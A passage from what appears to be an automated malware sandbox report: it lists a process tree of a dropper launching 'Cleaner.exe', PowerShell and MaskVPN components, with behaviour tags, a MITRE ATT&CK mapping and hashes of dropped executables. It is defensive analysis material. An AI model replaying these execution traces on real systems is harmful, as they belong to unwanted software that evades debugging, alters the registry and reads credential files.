                                                                                                                                                                                                                                                                                                                  PID:192
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                                    PID:4112
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x180,0x210,0x7ff80754dec0,0x7ff80754ded0,0x7ff80754dee0
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:3556
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff75dcf9e70,0x7ff75dcf9e80,0x7ff75dcf9e90
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:4328
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --lang=fr --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --mojo-platform-channel-handle=1676 /prefetch:8
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:6636
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:2
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:7036
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --lang=fr --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --mojo-platform-channel-handle=2012 /prefetch:8
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:5124
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --disable-gpu-compositing --lang=fr --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2008 /prefetch:1
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                PID:68
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --disable-gpu-compositing --lang=fr --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2504 /prefetch:1
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                PID:6740
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2932 /prefetch:2
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                  PID:6148
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --lang=fr --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --mojo-platform-channel-handle=3052 /prefetch:8
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:7260
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --lang=fr --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --mojo-platform-channel-handle=3592 /prefetch:8
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:7252
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --lang=fr --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --mojo-platform-channel-handle=1568 /prefetch:8
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:7536
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --lang=fr --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --mojo-platform-channel-handle=3720 /prefetch:8
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:7708
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,10186005753600661535,16679381099212488678,131072 --lang=fr --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4112_540092494" --mojo-platform-channel-handle=1688 /prefetch:8
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:5716
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_9D96.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:3872
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:1748
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:9084
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                          PID:3820
                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                          PID:6028
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{752f94ca-c551-1849-a48d-8b5e9a2f192e}\oemvista.inf" "9" "4d14a44ff" "0000000000000138" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                            PID:4860
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000138"
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                            PID:3592
                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:6024
                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                            PID:6076
                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                            PID:5664
                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                              PID:4220

                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                                                                                          Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1089

                                                                                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                                                                                          File Permissions Modification

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1222

                                                                                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1130

                                                                                                                                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                                                                                          Software Discovery

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1518

                                                                                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                                                                          T1120

                                                                                                                                                                                                                                                                                                                                          Remote System Discovery

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1018

                                                                                                                                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            c1fc20a539360941d7cfcf4f72c8fbee

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            fd1acb85f235dc58eae498e8dce26e869e2a6c33

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            0610bd7b4126a37bff57b587485c0c5fea530cefeb9cfec84aa571c3da54ea90

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            fd6711583fc7e9674cf3a7f5e5f2ed37f725a35723714d8fd336162fea31018e1d00b51ae0ea4c3cda22f07ac4e7daeb71ffb6e67fd864397fb89b1a8a071d06

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            c1fc20a539360941d7cfcf4f72c8fbee

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            fd1acb85f235dc58eae498e8dce26e869e2a6c33

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            0610bd7b4126a37bff57b587485c0c5fea530cefeb9cfec84aa571c3da54ea90

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            fd6711583fc7e9674cf3a7f5e5f2ed37f725a35723714d8fd336162fea31018e1d00b51ae0ea4c3cda22f07ac4e7daeb71ffb6e67fd864397fb89b1a8a071d06

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            08bb4d3526ca85803f1d70369a25c9ae

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            42c2cb6886d2c53fd46c51ff1221530a9e12ef80

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            fd965711b1ff6f419283f9791177bc3c8c5aaa922e6fe80a5c97b29bea82e3ac

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            229be3a81ddc8ca7993a8431fa93cac861de07a5a0485146139c323a7441ed1e78fc38785935d64d5c765bf10b085d1f8908d821700d87f7b0d2a5984fb86884

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            08bb4d3526ca85803f1d70369a25c9ae

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            42c2cb6886d2c53fd46c51ff1221530a9e12ef80

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            fd965711b1ff6f419283f9791177bc3c8c5aaa922e6fe80a5c97b29bea82e3ac

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            229be3a81ddc8ca7993a8431fa93cac861de07a5a0485146139c323a7441ed1e78fc38785935d64d5c765bf10b085d1f8908d821700d87f7b0d2a5984fb86884

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            bccd53a03b5c10bb01ea07774e28e565

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            1b30911302eb57ae56e9591fd8d45d9fe4a85769

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            d75027c6fa953d45659c303978dd292dbf0d9409df7b99ebd63f7362deeafe38

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            2210251297c2a17ccd10d8bb8fdbd813ee5424d84aebe8ba8b088cbcdcce46ee82dce8be156e02966e60d9fb5dbc0856d97304950f317dae5b3a103fc29d1cd4

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            bccd53a03b5c10bb01ea07774e28e565

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            1b30911302eb57ae56e9591fd8d45d9fe4a85769

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            d75027c6fa953d45659c303978dd292dbf0d9409df7b99ebd63f7362deeafe38

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            2210251297c2a17ccd10d8bb8fdbd813ee5424d84aebe8ba8b088cbcdcce46ee82dce8be156e02966e60d9fb5dbc0856d97304950f317dae5b3a103fc29d1cd4

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            4e401d22ee5b72e1c6538656d82e5144

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            55caaab0a376cffa78ea8771d4540b161c6f5b6f

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            ed1df1275e9b366f02efaf0e09e2ca94a21c6dfad3d264bb283a2bb5b2cbca75

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            c1dc09e838dc65cd64b992c52899e67b5c820a1f244f951403409000941bfcce13eec3b4cf328e3bb1ba669845eff29a6775b7e8374620967ecae4806810d693

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            4e401d22ee5b72e1c6538656d82e5144

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            55caaab0a376cffa78ea8771d4540b161c6f5b6f

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            ed1df1275e9b366f02efaf0e09e2ca94a21c6dfad3d264bb283a2bb5b2cbca75

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            c1dc09e838dc65cd64b992c52899e67b5c820a1f244f951403409000941bfcce13eec3b4cf328e3bb1ba669845eff29a6775b7e8374620967ecae4806810d693

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            b709a5b4f9d210d4db9f0b721faa3499

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            e752d7ee243482144958a7afcc68f30a665e1823

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            f9617ba5e309553940b7ec01ed9a1bb52fd11e11a8edc437b429d9aff0c02c4f

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            0c726f7f492e959637fa97d8b61232544f98acb51158c1e39e9adaed786a23808fc03060f5a4020c0d2f0573fe2ee5ce2637517ca76f10b4d40db2b4b93ae2f1

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            b709a5b4f9d210d4db9f0b721faa3499

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            e752d7ee243482144958a7afcc68f30a665e1823

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            f9617ba5e309553940b7ec01ed9a1bb52fd11e11a8edc437b429d9aff0c02c4f

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            0c726f7f492e959637fa97d8b61232544f98acb51158c1e39e9adaed786a23808fc03060f5a4020c0d2f0573fe2ee5ce2637517ca76f10b4d40db2b4b93ae2f1

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            f980d94aee51ef842e4ea697f8f65b56

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            2c2038dc2f49c05f63de2ef8aa96b28dd4e110e2

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            9347e1ba195cd6ef282a4c1b540e4c7aeface7b6a443c9379f7e7aa60fc0227d

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            895a02b99a32a416ee488e821d1a831cb8853fdccb6d40980ffecd2d040663539d9b660e3b8cce8f988c4bc274eb039f0825e542c0cf0e98bf877867b192c093

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                                                                                                                                            MD5

